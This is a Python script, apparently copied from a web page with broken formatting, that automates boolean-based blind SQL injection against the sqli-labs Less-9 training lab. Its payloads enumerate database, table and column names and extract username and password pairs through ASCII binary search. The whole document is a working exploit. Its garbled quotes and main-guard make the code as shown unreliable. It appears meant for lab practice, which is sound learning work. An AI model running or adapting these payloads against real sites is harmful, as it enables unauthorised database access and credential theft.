coding=utf-8
import requests

class BoolSqlier:
url = “”

  1. def __init__(self, database=""):<br />        self.database = database<br />        self.url = BoolSqlier.url
  3. def get_database(self):
  5.     def send_request(i, mid):<br />            #查库名:<br />            #payload = "1')) and(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{})#".format(i, mid)<br />            #查表名:<br />            #payload = '1" and(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),{},1))>{})#'.format(i, mid)<br />            #查列名:<br />            #payload = '1" and(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),{},1))>{})#'.format(i, mid)<br />            #查字段:<br />            payload = "1' and(ascii(substr((select group_concat(concat_ws(0x7e,username,password)) from security.users),{},1))>{})#".format(i, mid)<br />            params = {"id": payload}<br />            resp = requests.get(self.url, params=params)<br />            return resp
  7.     def database_i_ascii_bt_mid(resp):<br />            if "You are in" in resp.text:<br />                return True<br />            else:<br />                return False
  9.     database = ""<br />        for i in range(1, 211):<br />            # head 和 tail 决定了database的字符的取值范围<br />            head = 32<br />            tail = 127<br />            while head < tail:<br />                mid = (head + tail) >> 1<br />                resp = send_request(i, mid)
  11.             if database_i_ascii_bt_mid(resp):<br />                    head = mid + 1<br />                else:<br />                    tail = mid<br />            if (head != 32):<br />                database += chr(head)<br />                print(database)<br />        self.database = database<br />        print(database)

if name == “main“:
BoolSqlier.url = “http://127.0.0.1/sqli-labs/Less-9/
sqli = BoolSqlier()
sqli.get_database()